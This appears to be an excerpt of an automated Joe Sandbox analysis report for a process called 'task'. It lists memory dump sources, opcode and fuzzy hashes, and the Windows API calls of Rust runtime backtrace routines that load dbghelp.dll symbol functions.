                                                                                                                                                                • Instruction Fuzzy Hash: CE81C2B4A00318CFCB24CFA8C985B9DBBB0BF49304F1085AAD859AB751D7759985CF91
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNELBASE(?,6C8A699D,?,6C8A689D,?,6C8A68AD,?,6C8A68F8), ref: 6C8A753A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: bcb6064916608da32aacadb9c06009c227a934168bf8a9312e44a02bf8ff0639
                                                                                                                                                                • Instruction ID: 842f3afdd1f65ebf15d42fc3c7691e58430ae4c22e3ef0a9187310498e86bbad
                                                                                                                                                                • Opcode Fuzzy Hash: bcb6064916608da32aacadb9c06009c227a934168bf8a9312e44a02bf8ff0639
                                                                                                                                                                • Instruction Fuzzy Hash: F5B002B4648701DFCF40DF69C5889197BF4AB49351B11485CE589C7320D7349484DB15
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 484f85606a031168e3e872533bef776fbeec6d01a47b876ea5e5006cb4396c34
                                                                                                                                                                • Instruction ID: ad8c9e81993bd640e975c46d8262b86554810f61bf37966b04caf86f5abd9984
                                                                                                                                                                • Opcode Fuzzy Hash: 484f85606a031168e3e872533bef776fbeec6d01a47b876ea5e5006cb4396c34
                                                                                                                                                                • Instruction Fuzzy Hash: D9622134A00218CFEB15DBA4D964BEEB773EF88310F1080A9C50AAB3A4DF355E859F55
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 999f623e34dd46dcfd97ad9579a869ded9e97c2f753b2a270aaa4761570cde55
                                                                                                                                                                • Instruction ID: ebda88c2c4bf616f830545d78fc14a1d1e7aba5062e70d072afb8f6b97baeb44
                                                                                                                                                                • Opcode Fuzzy Hash: 999f623e34dd46dcfd97ad9579a869ded9e97c2f753b2a270aaa4761570cde55
                                                                                                                                                                • Instruction Fuzzy Hash: D7223031B1665BCBDB199B70F85B1EE7FF1F72222178446ABE402C24B9EF394442DA40
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b755d6eeced04be9aa28110a55b043ef43e6c2ea327447f7178fe48dd8c2ca26
                                                                                                                                                                • Instruction ID: cc7400472f72c8f1f42b62293ef9989b081d5c3b6b47eb09c619bc2fdbc40d82
                                                                                                                                                                • Opcode Fuzzy Hash: b755d6eeced04be9aa28110a55b043ef43e6c2ea327447f7178fe48dd8c2ca26
                                                                                                                                                                • Instruction Fuzzy Hash: 4AF12F76E006149FCB58CF68D888AADB7F2FF89310B1A8099E515AB375CB31EC41DB54
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: dd524b908bf52b8afa4ba580592763c878480136ab53903eea33f989eedcde3d
                                                                                                                                                                • Instruction ID: e693ebe0770c52687d0db8940ff51509f394aa446dd7d1922114c454fc4fc262
                                                                                                                                                                • Opcode Fuzzy Hash: dd524b908bf52b8afa4ba580592763c878480136ab53903eea33f989eedcde3d
                                                                                                                                                                • Instruction Fuzzy Hash: 6BE18134A00209DFDF09DBA4E554BEEBBB3FB88320F108469E406AB758DA31AD519F55
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fa98a9c13a43bedb3581105b98109e8258717c882f9b001de80e98e198c4dfc9
                                                                                                                                                                • Instruction ID: a707c231f45f11973b431a4695ce889f2716829d36fad33f8bdf3c8f978be79e
                                                                                                                                                                • Opcode Fuzzy Hash: fa98a9c13a43bedb3581105b98109e8258717c882f9b001de80e98e198c4dfc9
                                                                                                                                                                • Instruction Fuzzy Hash: BFB1AA34B042518FDF299E28E858B7E7BE7BF88310F048969E406DB399DF35C8429791
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7b7d7479cee44146fe21b6fee7866de24dd54b5855e7ae399c1a769a686f4017
                                                                                                                                                                • Instruction ID: 8fc3a670ca86247489c2990c013fbf4c478c9bf72bc4a571c03913bb5f622ff8
                                                                                                                                                                • Opcode Fuzzy Hash: 7b7d7479cee44146fe21b6fee7866de24dd54b5855e7ae399c1a769a686f4017
                                                                                                                                                                • Instruction Fuzzy Hash: 69B15E38A51206EFDF08DB64E968B6EB7A2FF84315F508629D4129B2D8DF31DC52CB50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 99712c3a8e73f711d95ad417aa32ef1a2516cf2187d94cbb22dee2ee720134d7
                                                                                                                                                                • Instruction ID: 3ac4dc2c82070fdaa27b40872a7ed93c793f216cab45553dbb4581b059b1f111
                                                                                                                                                                • Opcode Fuzzy Hash: 99712c3a8e73f711d95ad417aa32ef1a2516cf2187d94cbb22dee2ee720134d7
                                                                                                                                                                • Instruction Fuzzy Hash: C381A135B04506CFCF58CF68E498AAEB7F2BF89210B1581A9D406E7368DB31D842DB50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a6e2519e6e9f76af57aba6ca762d81b1ae7678bea5ec15318cb0ff42e509d980
                                                                                                                                                                • Instruction ID: 5e4acef154f32085d579424595383af2dcc2e18fba8c17123d6f908a28520746
                                                                                                                                                                • Opcode Fuzzy Hash: a6e2519e6e9f76af57aba6ca762d81b1ae7678bea5ec15318cb0ff42e509d980
                                                                                                                                                                • Instruction Fuzzy Hash: E91104357056118FCF199A29D8A8A3EBBA2FF8575130985A9E807CB3A4CF31CC038790
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 339fb976c610c54d024c23e30aabe80fd3cc95b8385a4f320961aba5db79885b
                                                                                                                                                                • Instruction ID: 8352c876ea82fff00ea2a8027d7e5fde0d69b41cb3fe8644188d945cb788ae89
                                                                                                                                                                • Opcode Fuzzy Hash: 339fb976c610c54d024c23e30aabe80fd3cc95b8385a4f320961aba5db79885b
                                                                                                                                                                • Instruction Fuzzy Hash: 59216F34A5420BEFDF18DB25E828B7D77A2BF44318F504A28D4129B2D8EF32C846DB50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bfc78dde87276cea789aca1f78c4bc716075b5a8eaa8d727c1f05f39b78fffbf
                                                                                                                                                                • Instruction ID: 8882230a5ff9cc286a2623bbc263042e90a2a43a39197d495fe0fc0e315456b1
                                                                                                                                                                • Opcode Fuzzy Hash: bfc78dde87276cea789aca1f78c4bc716075b5a8eaa8d727c1f05f39b78fffbf
                                                                                                                                                                • Instruction Fuzzy Hash: CA01F531B042845FD70946766C5C6FFBBAFAFC9320B15487AE006C7385DE29CC078AA5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 065082a0f7e45f44f2dd11033b7c0439079977bdcec6bba6fdf2bba28b033a0b
                                                                                                                                                                • Instruction ID: a2f5a2dd5bf065f5738cb0c5f68d436b9acad21a266a2dedfc2366ea06e2a48a
                                                                                                                                                                • Opcode Fuzzy Hash: 065082a0f7e45f44f2dd11033b7c0439079977bdcec6bba6fdf2bba28b033a0b
                                                                                                                                                                • Instruction Fuzzy Hash: B30128317053445BD708467A682C6BFBAAFAFC9320B048876E406C3389CE39CC0286A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 11135fc2d383f3c102d0d81b6d8059c07ee1b68ae35b4ca490d47bd7592741bb
                                                                                                                                                                • Instruction ID: b33e3156fb8119ef4dca9b29f29377116fbd1c8d83b28988da444b3842184bba
                                                                                                                                                                • Opcode Fuzzy Hash: 11135fc2d383f3c102d0d81b6d8059c07ee1b68ae35b4ca490d47bd7592741bb
                                                                                                                                                                • Instruction Fuzzy Hash: B001F7317013149BDB196638982079E37E79BC5718F1005BED9059B384DF73AC119791
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8cc4df2902edaf8a01801bbdf8dcbb160efa97267539d057801fb9fd947d6bf9
                                                                                                                                                                • Instruction ID: 89182f761bf839c5397dba48b843be8fab572068bfd300af0559636e32a1f6ed
                                                                                                                                                                • Opcode Fuzzy Hash: 8cc4df2902edaf8a01801bbdf8dcbb160efa97267539d057801fb9fd947d6bf9
                                                                                                                                                                • Instruction Fuzzy Hash: 9F01A236B041186B8F099E59A814AAF7AEBEBC9750B148029F505D7244DF71DC239B91
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fc11640c6de1bc010636637605f9fe94c7dc4f154c59089c7605bbafe3cd03d1
                                                                                                                                                                • Instruction ID: 5b94b82b0176b9a81de814cb73121de45befe8061cc9c3c9c18078e69af15da7
                                                                                                                                                                • Opcode Fuzzy Hash: fc11640c6de1bc010636637605f9fe94c7dc4f154c59089c7605bbafe3cd03d1
                                                                                                                                                                • Instruction Fuzzy Hash: 8D118238A5420BEBDB08DB74E9287ADBBA2BF40318F504A18D4139B2D4EF71C847DB51
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 88ffaa6dd24f986799bdf9d127ac802307cf5a87c6cbf1d6b3ec814080771e03
                                                                                                                                                                • Instruction ID: 9c9960bcfbffce6c7a00618fa335fd532c066791959d4a5dab141bce5f59bae9
                                                                                                                                                                • Opcode Fuzzy Hash: 88ffaa6dd24f986799bdf9d127ac802307cf5a87c6cbf1d6b3ec814080771e03
                                                                                                                                                                • Instruction Fuzzy Hash: D301F43AA042086FCF05CE95AC14BEF7BEAEFC9350F498025F505D7284DB31D8229B91
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 95a49a3d1197d7607b9f6c0a6c6f1da6a7627e79279986712b34a417be9ee487
                                                                                                                                                                • Instruction ID: e471632207935b4700c5488cadf40602469dc2ea5e2e4d1e61ebf48546a887a9
                                                                                                                                                                • Opcode Fuzzy Hash: 95a49a3d1197d7607b9f6c0a6c6f1da6a7627e79279986712b34a417be9ee487
                                                                                                                                                                • Instruction Fuzzy Hash: 26F0A772B001409FC71553FD98A896EBBE6EFC97713114469D40AC7395DD25CC068BA1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f48a5b1dda4296d0638bd9ce63b23e1ba5387b20df11d5a200ea7a0316477a83
                                                                                                                                                                • Instruction ID: cd18b9d54f4ec4fcf31eed7e29e43d8dcfebed296e3cef1099ac7567617f61d8
                                                                                                                                                                • Opcode Fuzzy Hash: f48a5b1dda4296d0638bd9ce63b23e1ba5387b20df11d5a200ea7a0316477a83
                                                                                                                                                                • Instruction Fuzzy Hash: 6FF05276F082408FDB0497B8A8641ADBBA2EF8563034048DAD00ACF375DA25DC078B51
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5c1549b165ff854cf13332c045fe9fa266b0984b18f7f14a78e3f01de1130cf9
                                                                                                                                                                • Instruction ID: ad015b54159b2d9cc589f1ae5dafed9ff70446db457398c41cb062261bc73d22
                                                                                                                                                                • Opcode Fuzzy Hash: 5c1549b165ff854cf13332c045fe9fa266b0984b18f7f14a78e3f01de1130cf9
                                                                                                                                                                • Instruction Fuzzy Hash: E2E09235B002149F8614A6BEA89896EB7EAFFC9A703604469E50AC7350DE71DC0187E4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: be3f5aa21a3e3127cbc2e7b485aea666e975e7089e6c86c19256b174e9e86aab
                                                                                                                                                                • Instruction ID: d49a91987acd116483f90bae24dcfd0d73cc4b4d585f1bab38fb5b385f8b4e17
                                                                                                                                                                • Opcode Fuzzy Hash: be3f5aa21a3e3127cbc2e7b485aea666e975e7089e6c86c19256b174e9e86aab
                                                                                                                                                                • Instruction Fuzzy Hash: A9E04F3495420FDBDF18DB70E9286AEBB62AB40314FA04A15D516A6184EF718506AA61
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ae069d93390f37076743deed165a04589f75bb83e8287ae4835b92ee1fba00df
                                                                                                                                                                • Instruction ID: 223a70e246513be7d31f3ca6e7a9be8a25aa8de43f8674738286d6ce6d8357ff
                                                                                                                                                                • Opcode Fuzzy Hash: ae069d93390f37076743deed165a04589f75bb83e8287ae4835b92ee1fba00df
                                                                                                                                                                • Instruction Fuzzy Hash: EDE0863499020FDBDF08DB70DD287EEBB72BF40314F604A15D516A51C4EF7185069A50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2ab5d63bded4ccebcf1d2b398d92998b0e754fb07dfdf918bfe90672ba132956
                                                                                                                                                                • Instruction ID: 1ffbf053741430893cb719b155c67d8d17b1b562f4da0f27d34137df40f72203
                                                                                                                                                                • Opcode Fuzzy Hash: 2ab5d63bded4ccebcf1d2b398d92998b0e754fb07dfdf918bfe90672ba132956
                                                                                                                                                                • Instruction Fuzzy Hash: 78D0C2345047485FDB02EB70A9A82C43B66EB81224B00C590D4424E90EEB3048268F41
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 04d15a5e9de7882f4b85ed6a04ea378a1b192aef4fdf0aa39862b26b057a9d83
                                                                                                                                                                • Instruction ID: f935d1bb04e485d698d5897a3933e588c7e9098da55c7463c7c848f7387d8309
                                                                                                                                                                • Opcode Fuzzy Hash: 04d15a5e9de7882f4b85ed6a04ea378a1b192aef4fdf0aa39862b26b057a9d83
                                                                                                                                                                • Instruction Fuzzy Hash: A3C0123454070C57D601F765F954695379EBA80624780D914E0460BA0DFF7499654F99
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7bca4f694708c16f1fbc3a78a2260284eedd16c489afddd72a408086c5bcddfb
                                                                                                                                                                • Instruction ID: 6a2ebfc9ac12ca1d1a05562cf6796e61f50e64154675c7351b6c5ad09635e05f
                                                                                                                                                                • Opcode Fuzzy Hash: 7bca4f694708c16f1fbc3a78a2260284eedd16c489afddd72a408086c5bcddfb
                                                                                                                                                                • Instruction Fuzzy Hash: 71C00235FA02499BDF186BB4FC1D1DDBB60EB9432A7001876E21BC2450DF7686779B41
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6C8DB880
                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6C8DB894
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6C8DB8C7
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetOptions), ref: 6C8DB8F6
                                                                                                                                                                • GetProcAddress.KERNEL32(SymInitializeW), ref: 6C8DB926
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DB942
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6C8DB9C2
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DB9D7
                                                                                                                                                                • lstrlenW.KERNEL32(00000002), ref: 6C8DB9EC
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6C8DBA1D
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6C8DBA9C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C8DBABF
                                                                                                                                                                • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6C8DBB43
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DBB58
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6C8DBBBD
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DBBD5
                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 6C8DBC19
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                                                                                                                                                • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                                                                                                                                • API String ID: 422451348-356128008
                                                                                                                                                                • Opcode ID: a3b11f2f079f02439e9f9753ff7816208c6cabba731e4d9f06877534714f6b45
                                                                                                                                                                • Instruction ID: 6e24b8e56c2c9d98a480e645efdd49c5c9da6234cba4ec149c222dee84a6f719
                                                                                                                                                                • Opcode Fuzzy Hash: a3b11f2f079f02439e9f9753ff7816208c6cabba731e4d9f06877534714f6b45
                                                                                                                                                                • Instruction Fuzzy Hash: 74D1E3B1F442589BDB20CFB5C944BAE7BB0BB4A714F21492CE805A7780EB75E845CB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(6C906AC4,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8DFB47
                                                                                                                                                                • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6C8DFB83
                                                                                                                                                                • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6C8DFBCB
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6C8DFCC2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                                                                                • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                                                                                                                                • API String ID: 2190909847-1953985048
                                                                                                                                                                • Opcode ID: 18762eb75c30a756e5b0847702ff5010affcd6918843845585c1fdc60b145117
